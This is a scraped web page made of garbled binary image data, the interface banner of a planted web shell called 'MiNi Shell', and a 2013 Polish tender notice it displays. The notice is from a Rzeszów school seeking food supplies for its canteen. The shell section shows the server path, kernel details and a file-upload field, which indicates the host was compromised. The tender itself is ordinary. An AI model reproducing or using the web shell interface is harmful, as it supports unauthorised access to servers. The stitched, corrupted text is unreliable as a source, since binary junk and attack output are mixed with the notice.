JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131128/256271-N-2013.html

<p class="kh_header"><b>Rzeszów: Dostawa artykułów żywnościowych do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 256271 - 2013; data zamieszczenia: 28.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Kształcenia Ustawicznego , ul. Sucharskiego 4, 35-225 Rzeszów, woj. podkarpackie, tel. 0-17 8520943, faks 0-17 8520943.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. PAKIET NR I   Mięso, Wędliny CPV  151 00000-9, 15131130-5
2. PAKIET NR II Produkty mleczarskie CPV   155 00000-3   
3. PAKIET NR III    Drób  CPV 15112000-6
4. PAKIET NR IV  Ryby Jaja Konserwy CPV 15131000-5, 15119600-1
5. PAKIET NR V  Pieczywo i wyroby cukiernicze CPV  15811000-9
6. PAKIET NR VI Przyprawy CPV 15870000-7
7. PAKIET NR VII   Warzywa Owoce Napoje CPV 15980000-1, 03221000-6, 03222000-3
8. PAKIET NR VIII Warzywa konserwowe lub puszkowe CPV 1531400.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ)                                   

Ocena spełnienia przez Wykonawcę tego warunku udziału w postępowaniu będzie dokonywana przez Zamawiającego na podstawie złożonego w raz z ofertą oświadczenia wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ)                                   

Ocena spełnienia przez Wykonawcę tego warunku udziału w postępowaniu będzie dokonywana przez Zamawiającego na podstawie złożonego w raz z ofertą oświadczenia wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ)                                   

Ocena spełnienia przez Wykonawcę tego warunku udziału w postępowaniu będzie dokonywana przez Zamawiającego na podstawie złożonego w raz z ofertą oświadczenia wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ)                                   

Ocena spełnienia przez Wykonawcę tego warunku udziału w postępowaniu będzie dokonywana przez Zamawiającego na podstawie złożonego w raz z ofertą oświadczenia wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ)                                   

Ocena spełnienia przez Wykonawcę tego warunku udziału w postępowaniu będzie dokonywana przez Zamawiającego na podstawie złożonego w raz z ofertą oświadczenia wg formuły spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	Informacja  na podstawie art. 24 ust. 2 pkt. 5 ustawy PZP zł. 4a

- Oświadczenie, że osoby które zajmują się dostawą towaru posiadają aktualne badania do celów sanitarno - epidemiologicznych na druku załącznik nr 5 do SIWZ.

- Oświadczenie potwierdzające, że oferowane artykuły są dopuszczone do obrotu na terenie Polski zgodnie z ustawą o warunkach zdrowotnych żywności i żywienia oraz że Wykonawca  wdrożył lub rozpoczął wdrażanie systemu HACCP na druku załącznik nr 6 do SIWZ.
 
-Oświadczenie Wykonawcy o akceptacji ogólnych warunków umowy zawarte w projekcie umowy  oraz treści SIWZ- załącznik nr 7 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsku.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Kształcenia Ustawicznego w Rzeszowie
ul. Sucharskiego 4
35-225 Rzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2013 godzina 09:00, miejsce: Zespół Szkół Kształcenia Ustawicznego w Rzeszowie
ul. Sucharskiego 4,35-225 Rzeszów- sekretariat nr. 18- parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1. PAKIET NR I   Mięso, Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	J.m.	Ilość
1.	Schab b/k	kg	850
2.	Karkówka	kg	100
3.	Łopatka b/k	kg	720
4.	Żeberka	kg	30
5.	Boczek wędzony	kg	40
6.	Mięso od szynki kulka	kg	280
7. 	Szynka konserwowa wieprzowa w bloku 55%  mięsa	kg	720
8.	Szynka gotowana	kg	80
9. 	Szynka staropolska	kg	220
10.	Polędwica sopocka	kg	784
11.	Schabik wieprzowy wędzony	kg	50
12.	Kiełbasa wiejska drobiowa	kg	60
13.	Szynka chłopska	kg	110
14. 	Kiełbasa zwyczajna	kg	60
15.	Kiełbasa podwawelska	kg	960
16.	Krakowska parzona	kg	600
17.	Kiełbasa szynkowa extra	kg	80
18.	Pasztet pieczony	kg	250
19.         	Szynka parmeńska	kg	60
20. 	Parówka cienka 70% mięsa	kg	50
21.	Kabanosy drobiowe drobno rozdrobnione 
	  kg	25
22.	Kornetki	kg	280
23. 	Kiełbasa wiejska wieprzowa	kg	50
24	Kiełbasa głogowska	kg	20
25	Szynka laurowa	kg	175
26	Kabanosy wieprzowe	kg	20
27	Szynka z pieca	kg	40
28	Łopatka zapiekana	kg	20
29	Polędwica drobiowa
(mięso z kurczaka 50%)	kg	100
30	Filet wędzony z indyka	kg	228
31	Mortadela	kg	20
32	Szynka  drobiowa
(mięso 46%)	kg	165
33	Kaszanka (krupniok -grilowa)	kg 	20
34	Kiełbasa drobiowa sucha	kg	65
35	Mięso od szynki płat	kg	100
36	Krakowska parzona	kg	20
37	Pasztet luksusowy w jelicie	kg	40
38	Smalec	kg	20
39 	Boczek prasowany	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR II Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto
1.	Mleko 2% butelka - 1l.
(pasteryzowane w wysokiej temperaturze)	szt	3000	
2.	Masło Extra 82%-200g.	szt	1360	
3.	Ser biały do chleba w kubku-100g. naturalny,warzywa, papryka, szczypiorek,pieprz	szt	400	
4.	Ser fromage 80g.
górski przysmak	szt	200	
5.	Serek twarogowy ziarnisty 200g.	szt	320	
6.	Serek puszysty twarogowy 150g.różne smaki (kubek) Bieluch lub równoważny	szt	400	
7.	Ser sałatkowo-kanapkowy Fetta 270g.	szt	60	
8. 	Ser żółty Rydzki	kg	219	
9.	Serek plastry 150g.Hochland lub równoważny	szt	3900	
10.	 Śmietana 18% -250ml.	szt	 1000
11.	Ser żółty Gouda	kg	880
12.	Ser żółty Salami	kg	50
13. 	Serek kremowy topiony baton 100g	szt	100
14.	Serki topione 100g
Z szynką , salami, śmietankowy Hochland lub równoważny	szt	300
15.	Kefir luksusowy 2% 200ml.	szt	200
16.	Jogurt pitny różne smaki 195g	szt	400
17.	Jogurt owocowy Danon biszkoptowy120g. lub równoważny	szt	200
18.	Jogurt Polskie Smaki 130g	szt	200
19.	Ser mozzarella 125g.	szt	100
20	Serek śmietankowy naturalny 135g.	szt	400
21	Margaryna zwykła 250g.	szt	
560
22	Masło roślinne 500g	szt	20
23	Twaróg półtłusty duża kostka	kg	700
24	Twaróg półtłusty mała kostka250g	
kg	150
25	Kefir butelka400g 	szt	200
26	Jogurt owocowa wyspa 150g	szt	1330
27	Jogurt 7 zbóż 150g.
Z truskawkami i ziarnami	szt	765
28	Jogurt pitny 0% tłuszczu truskawskowy 250g.	szt	610
29	Serki Topione krążki 25g. Hochland lub równoważny	szt	2688
30	Ser żółtyWłoszczowski typ Szwajcarski	kg	120
31	Ser żółty wędzony	kg	38
32	Ser kremowy typu Camembert 120 g	szt	240
33	Ser Gouda plastry różne smaki 150g (paczkowany )	szt	200
34	Serek Almette różne smaki 150g.	szt	380
35	Serek Morski 	kg	40
36	Ser śródziemnomorski z ziołami oliwkami i 
czosnkiem 100g	szt	200
37	Mleko 3,2%-butelka1L	szt	2400
38	Masło 83%	szt	400
39	Twaróg sernikowy 1kg.	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR III   Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto
1.	Kurczak 	kg	575	
2.	Piersi z kurczaka	kg	930	
3.	Udka z kurczaka	kg	200	
4.	Kości kulinarne	kg	20	
5.	Filet z indyka	kg	100
6.	Podudzie z kurczaka	kg	80
7.	Skrzydełka z kurczaka	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR IV   Ryby Jaja Konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość
1.	Ryba wędzona Makrela	kg	100
2.	Filet mrożony Mintaj	kg	400
3	Filet mrożony Tilapia	kg	205
4.	Makrela w pomidorach -300g	szt	135
5.	Filet śledziowy -2,5 kg	kg	305
6.	Gulasz Angielski-290g	szt	384
7.	Mielonka -300g	szt	100
8.	Pasztet z drobiu-155g	szt	2659
9.	Jaja 63-73 kl. L	   szt	17010
  10.	Tuńczyk kawałki -170g
w oleju	  szt	 325
11	Filet śledziowy Matjas w oleju 250g	 szt	83
  12	Filety śledziowe po Kaszubsku 500g	 kg	20
   13	Koreczki śledziowe po Giżycku 200g.	  szt	200
14 	Szproty w pomidorach 170g	szt	95
15	Paprykarz 160g	  szt	400
16	Pasztet z drobiu 131g	  szt	100
17	Szynka drobiowa 110g	  szt	500
18	Szynka z indyka 110g	szt	100
19	Pasta z Łososia 100g	szt	100
20	Pasztet z Drobiu 50g	szt	200
21	Pstrąg mrożony	kg	110
22	Łosoś norweski wędzony	kg	90
23	Łosoś mrożony dzwonki 	kg	220
24	Paluszki rybne 300g	szt	140
25	Filet śledziowy w sosie z suszonymi pomidorami 2,5 kg.	kg	60
26	Filet mrożony dorsz                	kg	120
27	Filet mrożony miruna 	kg	110
28	Filet z markeli w pomidorach170g	szt	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.11.96.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR V  Pieczywo i wyroby cukiernicze 15811000-9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość
1.	Chleb krojony 0,7 kg.	szt	11680
2.	Bułka pszenna 100g.	szt	23220
3.	Bułka grahamka 100g.	szt	2000
4.	Chleb żytni 500g.	szt	800
5	Bułka z ziarnem 100g.	szt	1000
6	Sztangiel pszenny 100g.	szt	1000
7	Chleb graham 0,5 kg.	szt	500
8	Kapuśniak 110g.	szt	800
9	Pasztecik 110g.	szt	800
10.	Drożdżówka 110g. z jabłkiem	szt	1620
11	Pączek 100g.	szt	1000
12 	Kremówka	kg	400
13	Szarlotka	kg	300
14	Sernik	kg	400
15	Bułka tarta	kg	350
16	Drożdzówka z serem 120g	szt	600
17	Bułka orkiszowa 100g	szt	600
18	Bułka maślana 100g	szt	800
19	Obwarzanek wyborowy100g	szt	600
20	Bułka cebularz 100g	szt	250
21	Babeczka z jabłkiem 70g	szt	600
22	Babeczka z kremem 70g	szt	1495.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR VI Przyprawy 15870000-7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto
1.	Mąka typ 500-1kg	kg	950	
2.	Makaron nitki, muszelki, rurki,świderki-2kg	kg	780	
3.	Kasza jęczmienna-1kg	kg	530	
4.	Cukier-1kg	kg	1860	
5.	Ryż-1kg	kg	710	
6.	Sól-1kg	kg	390	
7.	Pieprz op. po 20g	szt	680	
8.	Kucharek- 200g	szt	430	
9.	Majeranek op. po 15g	szt	80	
10.	Ziele angielskie-12g	szt	45	
11.	Rosołki drobiowe -180g	szt	362	
12.	Kminek 16g	szt	85	
13.	Przyprawa do zup 960ml.	szt	108	
14.	Ocet- 0,5l	szt	106	
15.	Olej -1l. uniwersalny	szt	60	
16.	Kakao-100g	szt	90	
17.	Kawa Inka-150g	szt	50	
18.	Kwasek cytrynowy-20g	szt	110	
19.	Dżem - 6 kg	kg	406	
20.	Herbata  gran. -90g	szt	350	
21.	Krem czekoladowy-230g	szt	250	
22.	Makaron Łazankowy  500g	kg	80	
23.	Bulion grzybowy -80g	szt	88	
24.	Papryka suszona-20g	szt	270	
25.	Żelatyna-50g	szt	60	
26.	Sos pieczeniowy-38g	szt	210	
27.	Sos sałatkowy-9g	szt	330	
28	Ketchup -480ml.	szt	230	
29.	Majonez -260g	szt	1420	
30.	Liście laurowe-5g	szt	75	
31.	Płatki kukurydziane  -500g	szt	125	
32.	Kasza manna -500g	kg	15	
33.	Mąka ziemniaczana-500g	kg	30	
 34.	Zioła prowansalskie-10g	szt	60
35.	Makaron muszelki
(drobny   500g	kg	145
36.	Kasza gryczana 500g	kg	100
37. 	Pieprz ziołowy 20g	szt	80
38.	Bazylia 10g	szt	50
39.	Olej Rzepakowy 1l	szt	300
40.	Olej Słonecznikowy 1l	szt	20
41.	Przyprawa do ryb 20g	szt	30
42.	Kurkuma mielona 15g	szt	50
43.	Przyprawa kebab-gyros - 20g	szt	50
44. 	Cukier Waniliowy 16 g	szt	40
45.	Kisiel różne smaki  -38g	szt	400
46.	Budynie  40g	szt	60
47.	Galaretki owocowe  75g 	szt	100
48.	Koncentrat barszczu czerwonego  300ml	szt	30
49.	Płatki zbożowe z miodem  250g	szt	70
 50.	Płatki zbożowe z czekoladą  500g	szt	46
  51.	Płatki zbożowe (owoce i błonnik) 250g	szt	80
52.	Kisiel z kawałkami owoców 30g	szt	400
53.	Żurek 450g. kubek	szt	130
54.	Olej kujawski z pierwszego tłoczenia 1 l.	szt	60
55.	Olej roślinny z oliwą z oliwek 1 l.	szt	450
56.	Ketchup 342 g. 	szt	80
57.
	Sos do kanapek 450g. różne smaki	
szt	125

58.	Estragon 10g.	szt	50
59	Kminek mielony 20g.	szt	50
60	Oregano 10g.	szt	30
61	Marynata do mięs 20g.	szt	70
62	Przyprawa do potraw z jaj 20g.	szt	50
63	Przyprawa do dań z fasoli 20g.	szt	40
64	Oliwa z oliwek extra virgine 500ml	szt
	30

65	Majonez dekoracyjny 400ml	szt	150
66	Sos chrzanowy 250ml	szt	180
67	Sos czosnkowy 250ml	szt	100
68	Makaron kokardki 400g 	kg	100
69	Makaron pełnoziarnisty 400g	kg	120
70	Wafle ryżowe 100g 	szt	400
71	Płatki owsiane 500g	kg	20
72	Kasza Kuskus 300g	szt	150
73	Przyprawa do zup w płynie 210ml	szt	50
74	Sos z grzybów leśnych 900g	szt	11
75	Sos sałatkowy ogrodowy 700g	szt	15
76	Bukiet smaku przyprawa 500g	szt	100
